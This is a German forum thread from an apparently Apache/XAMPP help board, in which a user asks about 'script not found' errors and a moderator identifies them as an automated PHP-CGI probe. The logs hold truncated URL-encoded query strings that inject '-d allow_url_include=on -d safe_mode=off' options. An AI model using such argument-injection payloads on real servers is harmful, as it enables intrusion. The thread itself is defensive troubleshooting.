Apache Error "script not found or unable"

Alles, was den Apache betrifft, kann hier besprochen werden.

Apache Error "script not found or unable"

Postby wot.stefan » 23. January 2014 22:54

Hey

Hab in letzter Zeit öfter "script not found or unable" in der error.log stehen.
Kann mir jemand erklären woher des kommt? Habe den Client POST rausgesucht:


Code: Select all
Error.log
[Thu Jan 23 17:57:47 2014] [error] [client 209.xx.xx.xx] script not found or unable to stat: /usr/lib/cgi-bin/php
[Thu Jan 23 17:57:47 2014] [error] [client 209.xx.xx.xx] script not found or unable to stat: /usr/lib/cgi-bin/php5
[Thu Jan 23 17:57:48 2014] [error] [client 209.xx.xx.xx] script not found or unable to stat: /usr/lib/cgi-bin/php-cgi
[Thu Jan 23 17:57:48 2014] [error] [client 209.xx.xx.xx] script not found or unable to stat: /usr/lib/cgi-bin/php.cgi
[Thu Jan 23 17:57:48 2014] [error] [client 209.xx.xx.xx] script not found or unable to stat: /usr/lib/cgi-bin/php4


Code: Select all
Access.log
209.xx.xx.xx - - [23/Jan/2014:17:56:19 +0100] "HEAD / HTTP/1.0" 200 273 "-" "-"
209.xx.xx.xx - - [23/Jan/2014:17:57:47 +0100] "POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%7$
209.xx.xx.xx - - [23/Jan/2014:17:57:47 +0100] "POST /cgi-bin/php5?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%$
209.xx.xx.xx- - [23/Jan/2014:17:57:48 +0100] "POST /cgi-bin/php-cgi?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%$
209.xx.xx.xx - - [23/Jan/2014:17:57:48 +0100] "POST /cgi-bin/php.cgi?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%$
209.xx.xx.xx - - [23/Jan/2014:17:57:48 +0100] "POST /cgi-bin/php4?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%$


Vielleicht kann mir jemand sagen was er da versucht

Mfg Stefan
wot.stefan
 
Posts: 2
Joined: 23. January 2014 22:48
XAMPP Version: 1.8.3-3
Operating System: WIN

Re: Apache Error "script not found or unable"

Postby Altrea » 23. January 2014 23:21

Hallo Stefan,

wot.stefan wrote:Vielleicht kann mir jemand sagen was er da versucht

Decodier doch mal die Entitys im POST String. Da versucht jemand oder etwas über die php CLI Sicherheitsrelevante Einstellungen abzuschalten.
Sieht mir nach der Vorbereitung zum Einschleusen von Schadcode aus.

mit freundlichen Grüßen,
Altrea
We don't provide any support via personal channels like PM, email, Skype, TeamViewer!

It's like porn for programmers 8)
User avatar
Altrea
AF Moderator
 
Posts: 6833
Joined: 17. August 2009 13:05
XAMPP Version: 5.5.19
Operating System: Windows 10 Pro x64

Re: Apache Error "script not found or unable"

Postby wot.stefan » 23. January 2014 23:47

hey habs mal decodiert

Code: Select all
/cgi-bin/php?-d allow_url_include=on -d safe_mode=off -d suhosin.simm


naja irgentwie komisch.
Also in meinem /usr/lib/cgi-bin/ hab ich garkeine skripts.
Hatte aber für den default-vhost noch ein ScriptAlias gesetzt:
Code: Select all
       ScriptAlias /cgi-bin/ /usr/lib/cgi-bin/
        <Directory "/usr/lib/cgi-bin">
                AllowOverride None
                Options +ExecCGI -MultiViews +SymLinksIfOwnerMatch
                Order allow,deny
                Allow from all
        </Directory>


Das hab ich jetzt mal rausgenommen.

Nur irgentwie komisch das jemand verschiedene skriptnamen ausprobiert
wot.stefan
 
Posts: 2
Joined: 23. January 2014 22:48
XAMPP Version: 1.8.3-3
Operating System: WIN

Re: Apache Error "script not found or unable"

Postby Altrea » 23. January 2014 23:50

wot.stefan wrote:Nur irgentwie komisch das jemand verschiedene skriptnamen ausprobiert

Das ist nichts ungewöhnliches. Es gibt haufenweise automatischer Scripte die öffentlich zugängliche Systeme auf bekannte Sicherheitslöcher abklopfen.
We don't provide any support via personal channels like PM, email, Skype, TeamViewer!

It's like porn for programmers 8)
User avatar
Altrea
AF Moderator
 
Posts: 6833
Joined: 17. August 2009 13:05
XAMPP Version: 5.5.19
Operating System: Windows 10 Pro x64


Return to Apache

Who is online

Users browsing this forum: No registered users and 4 guests